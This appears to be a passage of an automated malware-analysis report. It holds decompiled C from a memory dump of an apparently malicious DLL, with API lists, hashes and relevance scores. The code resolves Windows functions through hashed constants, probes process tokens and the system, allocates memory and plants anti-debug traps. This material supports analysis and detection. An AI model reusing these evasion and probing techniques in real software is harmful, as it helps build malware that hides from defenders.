								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E8C35C8(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E8BF5A8(_t429 + 0x18c, _t206);
								_t411 = E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E8BF678(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E8BF4E0(_t429 + 0x18c, 0);
								_t213 = E6E8BF4F0(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E8C35C8(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E8BF4E0(_t429 + 0x18c, 0);
								E6E8BDF84(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E8C3044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E8BDFF8(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E8C3044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E8BE0A4(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E8C4FD4( *((intOrPtr*)(_t429 + 0x1b8)), E6E8BE8D4( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E8BDFDC(_t429 + 0x1b8);
								E6E8BDFDC(_t429 + 0x1b0);
								E6E8BF678(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E8BBB88(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e8cd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E8BBB88(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E8C35C8(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E8C35C8(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E8BF5A8(_t429 + 0x3c, _t262);
						_t265 = E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E8BF678(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E8BF4E0(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E8BF4F0(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E8C35C8(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E8BF4E0(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E8C3044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E8C35C8(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E8C0FF8(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E8C3044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E8C0FF8(_t403, _t413, _t403);
								}
								E6E8BF678(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E8BBB88(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E8BBB88(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e8c0763
0x6e8c0765
0x6e8c076c
0x6e8c0feb
0x6e8c0ff1
0x6e8c0ff1
0x6e8c0776
0x6e8c0782
0x6e8c078e
0x6e8c0793
0x6e8c07a0
0x6e8c07b1
0x6e8c07b3
0x6e8c07b4
0x6e8c07b5
0x6e8c07b5
0x6e8c07b6
0x6e8c07ba
0x6e8c07be
0x6e8c07c3
0x6e8c07c6
0x6e8c07cc
0x6e8c07e6
0x6e8c07ed
0x6e8c07f0
0x6e8c07f3
0x6e8c07f5
0x6e8c0801
0x6e8c080e
0x6e8c081b
0x6e8c081f
0x6e8c08ab
0x6e8c08ab
0x6e8c08ad
0x6e8c08b1
0x6e8c08bc
0x6e8c08d2
0x6e8c08d5
0x6e8c08d5
0x6e8c08d9
0x6e8c08e2
0x6e8c08e7
0x6e8c08e7
0x6e8c08e9
0x6e8c08fa
0x6e8c091c
0x6e8c091e
0x6e8c091f
0x6e8c0923
0x6e8c0923
0x6e8c092c
0x6e8c0938
0x6e8c0941
0x6e8c0957
0x6e8c0967
0x6e8c096c
0x6e8c0970
0x6e8c0975
0x6e8c0977
0x6e8c09c7
0x6e8c09dc
0x6e8c09e0
0x6e8c09e5
0x6e8c09f6
0x6e8c0a0b
0x6e8c0a0f
0x6e8c0a14
0x6e8c0a16
0x6e8c0a5d
0x6e8c0a60
0x6e8c0aae
0x6e8c0ab1
0x6e8c0af2
0x6e8c0af6
0x6e8c0afb
0x6e8c0b00
0x6e8c0b1f
0x6e8c0b1f
0x6e8c0b1f
0x6e8c0b21
0x00000000
0x6e8c0b21
0x6e8c0b02
0x6e8c0b06
0x6e8c0b08
0x6e8c0b0f
0x6e8c0b0f
0x6e8c0b15
0x6e8c0b15
0x6e8c0b17
0x6e8c0b1a
0x6e8c0b1a
0x00000000
0x6e8c0b17
0x6e8c0b0a
0x6e8c0b0d
0x6e8c0b13
0x6e8c0b13
0x00000000
0x6e8c0b13
0x00000000
0x6e8c0b0d
0x6e8c0ab3
0x6e8c0ab6
0x00000000
0x00000000
0x6e8c0abc
0x6e8c0ac1
0x6e8c0ac6
0x6e8c0ae5
0x6e8c0ae5
0x6e8c0aef
0x00000000
0x6e8c0aef
0x6e8c0ac8
0x6e8c0acc
0x6e8c0ace
0x6e8c0ad5
0x6e8c0ad5
0x6e8c0adb
0x6e8c0adb
0x6e8c0add
0x6e8c0ae0
0x6e8c0ae0
0x00000000
0x6e8c0add
0x6e8c0ad0
0x6e8c0ad3
0x6e8c0ad9
0x6e8c0ad9
0x00000000
0x6e8c0ad9
0x00000000
0x6e8c0ad3
0x6e8c0a62
0x6e8c0a64
0x6e8c0aa3
0x6e8c0aa6
0x6e8c0e18
0x6e8c0e1d
0x6e8c0e22
0x6e8c0e41
0x6e8c0e41
0x6e8c0e4b
0x00000000
0x6e8c0e4b
0x6e8c0e24
0x6e8c0e28
0x6e8c0e2a
0x6e8c0e31
0x6e8c0e31
0x6e8c0e37
0x6e8c0e37
0x6e8c0e39
0x6e8c0e3c
0x6e8c0e3c
0x00000000
0x6e8c0e39
0x6e8c0e2c
0x6e8c0e2f
0x6e8c0e35
0x6e8c0e35
0x00000000
0x6e8c0e35
0x00000000
0x6e8c0e2f
0x00000000
0x6e8c0aac
0x6e8c0a6a
0x6e8c0a6f
0x6e8c0a74
0x6e8c0a93
0x6e8c0a93
0x6e8c0a9d
0x00000000
0x6e8c0a9d
0x6e8c0a76
0x6e8c0a7a
0x6e8c0a7c
0x6e8c0a83
0x6e8c0a83
0x6e8c0a89
0x6e8c0a89
0x6e8c0a8b
0x6e8c0a8e
0x6e8c0a8e
0x00000000
0x6e8c0a8b
0x6e8c0a7e
0x6e8c0a81
0x6e8c0a87
0x6e8c0a87
0x00000000
0x6e8c0a87
0x00000000
0x6e8c0a81
0x6e8c0a18
0x6e8c0a1a
0x00000000
0x00000000
0x6e8c0a24
0x6e8c0a29
0x6e8c0a2e
0x6e8c0a4d
0x6e8c0a4d
0x6e8c0a57
0x00000000
0x6e8c0a57
0x6e8c0a30
0x6e8c0a34
0x6e8c0a36
0x6e8c0a3d
0x6e8c0a3d
0x6e8c0a43
0x6e8c0a43
0x6e8c0a45
0x6e8c0a48
0x6e8c0a48
0x00000000
0x6e8c0a45
0x6e8c0a38
0x6e8c0a3b
0x6e8c0a41
0x6e8c0a41
0x00000000
0x6e8c0a41
0x00000000
0x6e8c0a3b
0x6e8c097d
0x6e8c0982
0x6e8c0987
0x6e8c09a6
0x6e8c09a6
0x6e8c09b0
0x00000000
0x6e8c09b0
0x6e8c0989
0x6e8c098d
0x6e8c098f
0x6e8c0996
0x6e8c0996
0x6e8c099c
0x6e8c099c
0x6e8c099e
0x6e8c09a1
0x6e8c09a1
0x00000000
0x6e8c099e
0x6e8c0991
0x6e8c0994
0x6e8c099a
0x6e8c099a
0x00000000
0x6e8c099a
0x00000000
0x6e8c08be
0x6e8c08c0
0x6e8c0b25
0x6e8c0b2a
0x6e8c0b2d
0x6e8c0b32
0x6e8c0b34
0x6e8c0b49
0x6e8c0b4c
0x6e8c0c1a
0x6e8c0c22
0x6e8c0c25
0x6e8c0c3a
0x6e8c0c44
0x6e8c0c44
0x6e8c0c46
0x6e8c0c48
0x6e8c0c57
0x6e8c0c63
0x6e8c0c67
0x6e8c0c6a
0x6e8c0c6d
0x6e8c0c70
0x00000000
0x6e8c0c70
0x6e8c0b5c
0x6e8c0b6e
0x6e8c0b72
0x6e8c0bfe
0x6e8c0bfe
0x6e8c0c04
0x6e8c0c0f
0x6e8c0c06
0x6e8c0c06
0x6e8c0c06
0x00000000
0x6e8c0c04
0x6e8c0b7f
0x6e8c0b80
0x6e8c0b82
0x6e8c0b88
0x6e8c0fd7
0x6e8c0fdc
0x6e8c0fde
0x00000000
0x00000000
0x6e8c0fe4
0x6e8c0b9f
0x6e8c0ba3
0x6e8c0ba8
0x6e8c0bba
0x6e8c0bbe
0x6e8c0bc9
0x6e8c0bca
0x6e8c0bcb
0x6e8c0bcc
0x6e8c0bce
0x6e8c0bd9
0x6e8c0e51
0x6e8c0e51
0x6e8c0bd9
0x6e8c0bdf
0x6e8c0be8
0x6e8c0e63
0x6e8c0e79
0x6e8c0e7b
0x6e8c0e7d
0x6e8c0fb8
0x6e8c0fbf
0x00000000
0x6e8c0fbf
0x6e8c0e8c
0x6e8c0e9a
0x6e8c0eb4
0x6e8c0eb6
0x6e8c0eb8
0x6e8c0fc9
0x6e8c0fce
0x6e8c0fd0
0x00000000
0x00000000
0x6e8c0fd2
0x6e8c0ecc
0x6e8c0ed7
0x6e8c0ee6
0x6e8c0ef8
0x6e8c0efa
0x6e8c0efc
0x6e8c0f09
0x6e8c0f09
0x6e8c0f19
0x6e8c0f2a
0x6e8c0f2f
0x6e8c0f31
0x6e8c0f33
0x6e8c0f3a
0x6e8c0f3b
0x6e8c0f3b
0x6e8c0f47
0x6e8c0f68
0x6e8c0f71
0x6e8c0f7d
0x6e8c0f89
0x6e8c0f8e
0x6e8c0f93
0x6e8c0f99
0x6e8c0f99
0x6e8c0f9e
0x6e8c0fa4
0x00000000
0x6e8c0faa
0x6e8c0fac
0x00000000
0x6e8c0fac
0x6e8c0bee
0x6e8c0bee
0x6e8c0bf3
0x6e8c0bf9
0x6e8c0bf9
0x00000000
0x6e8c0bf3
0x6e8c0be8
0x6e8c08bc
0x6e8c082c
0x6e8c082d
0x6e8c082f
0x6e8c0835
0x6e8c0e02
0x6e8c0e07
0x6e8c0e09
0x00000000
0x00000000
0x6e8c0e0f
0x6e8c084c
0x6e8c0850
0x6e8c0855
0x6e8c086b
0x6e8c0882
0x6e8c0886
0x6e8c0c7e
0x6e8c0c7e
0x6e8c0886
0x6e8c088c
0x6e8c0895
0x6e8c0c8d
0x6e8c0c9e
0x6e8c0ca3
0x6e8c0ca5
0x6e8c0ca7
0x6e8c0dd8
0x6e8c0ddc
0x00000000
0x6e8c0ddc
0x6e8c0cb3
0x6e8c0cd8
0x6e8c0cda
0x6e8c0cdc
0x6e8c0df4
0x6e8c0df9
0x6e8c0dfb
0x00000000
0x00000000
0x6e8c0dfd
0x6e8c0ced
0x6e8c0cfb
0x6e8c0d02
0x6e8c0d03
0x6e8c0d04
0x6e8c0d16
0x6e8c0d18
0x6e8c0d1a
0x00000000
0x00000000
0x6e8c0d22
0x6e8c0d3d
0x6e8c0d3f
0x6e8c0d41
0x6e8c0de6
0x6e8c0deb
0x6e8c0ded
0x00000000
0x00000000
0x6e8c0def
0x6e8c0d47
0x6e8c0d4e
0x6e8c0d52
0x6e8c0dbd
0x6e8c0dbd
0x6e8c0dbf
0x6e8c0dc6
0x6e8c0dc6
0x6e8c0dcc
0x6e8c0dcc
0x6e8c0dce
0x6e8c0dd3
0x6e8c0dd3
0x00000000
0x6e8c0dce
0x6e8c0dc1
0x6e8c0dc4
0x6e8c0dca
0x6e8c0dca
0x00000000
0x6e8c0dca
0x00000000
0x6e8c0dc4
0x6e8c0d54
0x6e8c0d54
0x6e8c0d56
0x6e8c0d62
0x6e8c0d67
0x6e8c0d69
0x00000000
0x00000000
0x6e8c0d6b
0x6e8c0d6f
0x6e8c0d76
0x6e8c0d77
0x6e8c0d78
0x6e8c0d7a
0x00000000
0x00000000
0x6e8c0d7c
0x6e8c0d7e
0x6e8c0d85
0x6e8c0d85
0x6e8c0d8b
0x6e8c0d8b
0x6e8c0d8d
0x6e8c0d92
0x6e8c0d92
0x6e8c0d9b
0x6e8c0da0
0x6e8c0da5
0x6e8c0dab
0x6e8c0dab
0x6e8c0db0
0x00000000
0x6e8c0db0
0x6e8c0d80
0x6e8c0d83
0x6e8c0d89
0x6e8c0d89
0x00000000
0x6e8c0d89
0x00000000
0x6e8c0db7
0x6e8c0db7
0x6e8c0db8
0x6e8c0db8
0x00000000
0x6e8c0d56
0x6e8c089b
0x6e8c08a0
0x6e8c08a6
0x6e8c08a6
0x00000000
0x6e8c0c7d
0x6e8c0c7d
0x6e8c0c7d

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7), ref: 6E8C0882
GetSystemInfo.KERNELBASE(?,10154545,10154545,?,?,A89C042F,?,?,80C4A2B7,?,?,5E9822CF,00000000,80000002,00000000,-000000FC), ref: 6E8C0C44
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,8B9D0DA7,8B9D0DA7), ref: 6E8C0CD8

Strings

J}*, xrefs: 6E8C0D5B

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID: J}*
API String ID: 298373132-3566034359
Opcode ID: 7799fc456b621d926183be69e7d118825569ed4835d7a7e3fd2bfa6ee949094a
Instruction ID: 25c0d295708466f08112c584ae4931f92696e542f667c9738dc072bc55a47e04
Opcode Fuzzy Hash: 7799fc456b621d926183be69e7d118825569ed4835d7a7e3fd2bfa6ee949094a
Instruction Fuzzy Hash: 8422F6B0648345AFD761CBA8C850BDB77A9AF87B88F108D1CE5949B2D4EB30D845CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E8C223C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E8C3AD0(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E8C3044(0xfe338407, 0x8f5bb83f, 0xfe338407, 0xfe338407);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e8c223c
0x6e8c2240
0x6e8c225c
0x6e8c225f
0x6e8c2242
0x6e8c2251
0x6e8c2254
0x6e8c2254
0x6e8c226f
0x6e8c2274
0x6e8c2278
0x6e8c2280
0x6e8c2280
0x6e8c2284

APIs

NtDelayExecution.NTDLL(00000000,00000000,FE338407,FE338407,FFFFFFFF,FFFFFFFF,6E8B355F,00000000,00000000,?), ref: 6E8C2280

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction ID: 6e6d52db536c5317854d185ceb2a4b70c5944d5dacfd3919434bf66be49b16e1
Opcode Fuzzy Hash: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction Fuzzy Hash: 03E06DB064E6026EE6849BA94D04F6BB6D89F96B10F208E2CB055C36C4EB34C8018262

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C2840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8C2840(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E8C3044(0xfe338407, 0x9a85f5ac, 0xfe338407, 0xfe338407) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e8c2847
0x6e8c2850
0x6e8c285e
0x6e8c2881
0x6e8c2881
0x6e8c2860
0x6e8c2877
0x6e8c287b
0x00000000
0x6e8c287d
0x6e8c287d
0x6e8c287d
0x6e8c287b
0x6e8c2886

APIs

NtAllocateVirtualMemory.NTDLL(6E8C88BE,?,00000000,000000FF,6E8C88BE,6E8C88BE,FE338407,FE338407,?,?,6E8C88BE,00003000,00000004,000000FF), ref: 6E8C2877

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction ID: ea76991c4777a29f522af4ef3317bda8d59f10d4e06a5d32b8f539780916bbfd
Opcode Fuzzy Hash: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction Fuzzy Hash: A9E03071209743AFEB08DB98CC14D7BB7E9EF85704F104C1DB494C6590D735D8109712

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C3110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E8C3110(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E8C3488);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e8c3110
0x6e8c3115
0x6e8c3117
0x6e8c3119

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E8C3488,6E8C3100,FE338407,FE338407,?,6E8B6CB9,00000000), ref: 6E8C3117

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 21ec977caad00415517bc8d0240cdd8040bb4005d8ad919f60ebbea08f2d2c56
Instruction ID: 3ff67821fcf5c0100eb6defbf2b47aebcf66e75334fa970637cedf3d4d63c2f9
Opcode Fuzzy Hash: 21ec977caad00415517bc8d0240cdd8040bb4005d8ad919f60ebbea08f2d2c56
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C10C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6E8C10C8(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6E8C3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6E8BC2C4(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6E8BBB88(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6E8BF5A8( &_v32, _t26);
						_t68 = E6E8BF4E0( &(_t74[3]), 0);
						if(E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
							L32:
							E6E8BF678( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6E8C3044(0x8b9d0da7, 0xc660b8b, 0x8b9d0da7, 0x8b9d0da7);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6E8C3044(0x8b9d0da7, 0x86f13b09, 0x8b9d0da7, 0x8b9d0da7);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6E8BF678( &_v48);
						if(_v52 != 0) {
							E6E8BBB88(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6e8c10ca
0x6e8c10d7
0x6e8c10d9
0x6e8c10e8
0x6e8c10ec
0x6e8c10f6
0x6e8c10f6
0x6e8c10fc
0x6e8c10ff
0x6e8c1101
0x6e8c110c
0x6e8c1146
0x6e8c114b
0x6e8c1150
0x6e8c1150
0x00000000
0x6e8c110e
0x6e8c1118
0x6e8c112b
0x6e8c113c
0x6e8c113c
0x6e8c113e
0x6e8c1144
0x6e8c1162
0x6e8c1172
0x6e8c1189
0x6e8c126b
0x6e8c126f
0x00000000
0x6e8c126f
0x6e8c119f
0x6e8c11a3
0x00000000
0x00000000
0x6e8c11b5
0x6e8c11bc
0x00000000
0x00000000
0x6e8c11c2
0x6e8c11c4
0x6e8c11c5
0x6e8c11c6
0x6e8c11ca
0x00000000
0x00000000
0x6e8c11e1
0x6e8c11e5
0x00000000
0x00000000
0x6e8c11f2
0x6e8c11f6
0x00000000
0x00000000
0x6e8c11f8
0x6e8c11fc
0x6e8c124b
0x6e8c11fe
0x6e8c1203
0x6e8c1246
0x6e8c1205
0x6e8c120a
0x6e8c1241
0x6e8c120c
0x6e8c1211
0x6e8c123c
0x6e8c1213
0x6e8c1218
0x6e8c1237
0x6e8c121a
0x6e8c121f
0x6e8c1232
0x6e8c1221
0x6e8c1223
0x6e8c122b
0x6e8c122b
0x6e8c121f
0x6e8c1218
0x6e8c1211
0x6e8c120a
0x6e8c1203
0x6e8c1250
0x6e8c125a
0x6e8c125f
0x6e8c125f
0x00000000
0x6e8c1264
0x00000000
0x6e8c1144

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E8C113C
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E8C119F

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction ID: 950fc3bedc25b17ee9b6b771522c6946d82ba1236f101d99e314c1726086e73c
Opcode Fuzzy Hash: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction Fuzzy Hash: E141C379248302AFE751D7AD8CE0BAB66BD9B92F04F108C29F554CA1D0DA34CC4AC793

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E8C578C(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
